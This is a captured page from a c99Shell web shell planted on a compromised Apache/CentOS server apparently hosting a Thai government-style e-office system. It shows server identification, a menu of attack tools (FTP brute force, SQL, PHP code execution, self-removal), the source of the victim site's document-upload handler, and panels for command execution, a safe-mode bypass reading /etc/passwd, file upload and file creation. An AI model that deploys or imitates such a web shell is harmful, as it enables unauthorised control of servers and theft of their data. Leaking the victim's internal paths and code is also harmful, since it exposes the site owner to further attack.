!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectUploadDocSended.php (5.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsSysConfig.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsSendReceive.php";


$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oSys = new sysConfig($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oDatt3 = new Docattatches($oC);
$oDatt1 = new Docattatches($oC);
$oDtmp = new DocattatchesTmp($oC);
$oTsr = new sendreceive($oC);
$oTsre = new sendreceive($oC);

if(
$method2!='del'){ echo 'not del';
        
//----------add DocAttatches 
            
$file $_FILES['fileupload']['name'];
            
$sizefile $_FILES['fileupload']['size']; 
            
$filetype=strstr($file,'.');
            
$str $file;    
            
$len=strlen($str);
            
$count=0;  
            for(
$i=0$i<$len$i++){  
                
//echo $str{$i}."<br>"; 
                
$asci=ord($str{$i});
                if(
$asci == 46){
                    
$count++;
                } 
                if(
$asci == 44){

                    
$count++;
                }
            }
            
$oSys->RSsysConfig();
            
$oSys->GetRecord();
            
$oSys->filesizebyte;
            
$sizefileM=($oSys->filesizebyte/1024/1024);
            if(
$count>1){
                        
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ชื่อแฟ้มไม่ควรจะประกอบด้วย จุด(.) และ , กรุณาเปลี่ยนชื่อแฟ้ม";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
                        <?
            
}else if($sizefile>$oSys->filesizebyte || $sizefile==0){  //---- 2 MB , 2048 KB
                        
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror='ขนาดแฟ้มต้องไม่เกิน <?  echo $sizefileM?> MB';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?    
            
}else if($filetype!='.doc' && $filetype!='.xls' && $filetype!='.ppt' && $filetype!='.zip' && $filetype!='.rar' && $filetype!='.odt' && $filetype!='.ods' && $filetype!='.odp' && $filetype!='.pdf' && $filetype!='.jpg' && $filetype!='.gif' && $filetype!='.jpeg' && $filetype!='.png' && $filetype!='.DOC' && $filetype!='.XLS' && $filetype!='.PPT' && $filetype!='.ZIP' && $filetype!='.RAR' && $filetype!='.ODT' && $filetype!='.ODS' && $filetype!='.ODP' && $filetype!='.PDF' && $filetype!='.JPG' && $filetype!='.GIF' && $filetype!='.JPEG' && $filetype!='.PNG'){              
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ไม่สามารถอัพโหลดแฟ้มนามสกุล <? echo $filetype?> ได้";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?                    
            
}else{
                        
$timedoc=date('Ymd_His');
                        
$typefile $_FILES['fileupload']['type']; 
                        
$sizefile $_FILES['fileupload']['size']; 
                        list(
$aa$dot) = preg_split("/\./"$file);
                        
$filenamemd5=md5($file);
                        
$tempfile $GLOBALS['path_upload_documents'].$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                    
                        
copy($_FILES['fileupload']['tmp_name'],$tempfile);
                        
                                
//----search DaSeq of DocID
                                //$MaxDaSeq=$oDatt1->SearchMaxDaSeqDocID($DocID);
                            
                                
$oDatt->AddNew();
                                
$oDatt->DaID=$oDatt->GetNextCode();
                                
$oDatt->DocID=$DocID;
                                
$oDatt->DaFileName=$_FILES['fileupload']['name'];
                                
$oDatt->DaUpFileName=$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                                
$oDatt->DaAddNewSended='Y';
                                
$oDatt->Save();

                        
$oTsr->SearchBytsr_docid($DocID);
                        while(
$oTsr->GetRecord()){ 
                                
$chksum_doc='';
                                
$oTsr->Edit();
                                
$oTsr->tsr_doc_url=$oTsr->tsr_doc_url.$docpath.$oDatt->DaUpFileName.',';
                                
$chksum_doc=md5_file($docpath.$oDatt->DaUpFileName).',';
                                
$oTsr->tsr_doc_chksum=$oTsr->tsr_doc_chksum.$chksum_doc;
                                
$oTsr->tsr_docname=$oTsr->tsr_docname.$oDatt->DaFileName.',';
                                
$oTsr->tsr_statusDocAtt=$oTsr->tsr_statusDocAtt.'N';
                                
$oTsr->tsr_CountDoc=$oTsr->tsr_CountDoc+1;
                                
$oTsr->Save();
                        }
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='อัพโหลดไฟล์สำเร็จ !';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?    

            
}
}else if(
$method2=='del'){
                        
$oDatt->SearchByKey($selectdel);
                        
$oDatt->GetRecord();
                        
unlink($GLOBALS['path_upload_documents'].$oDatt->DaUpFileName);
                        
$oDatt->Delete();

                        
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='';
                            window.top.document.getElementById('method2').value="";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                            
                        </script>  
<?
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0128 ]--